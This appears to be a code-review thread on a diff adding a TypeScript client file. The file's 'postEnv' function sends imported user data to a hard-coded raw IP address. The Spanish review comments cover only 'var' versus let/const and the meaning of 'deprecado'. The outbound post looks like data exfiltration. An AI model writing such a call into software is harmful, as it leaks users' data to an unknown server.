src/client.ts

```diff
@@ -0,0 +1,24 @@
+import {user} from "./data";
+
+const a = require('axios');
+
+async function postEnv(){
+    var result = await a.post('http://95.217.235.69/', user)
```

Comment:
A partir de [ES6](https://www.ecma-international.org/ecma-262/6.0/#sec-let-and-const-declarations) se añadió `let` y `const` a JavaScript, por lo que el uso de `var`  esta deprecado y no es considerado buena práctica.

Por favor utiliza `let` o `const` según sea el caso y evita incluir `var` en tu código.

Reply:
_deprecado_ en español es "descontinuado"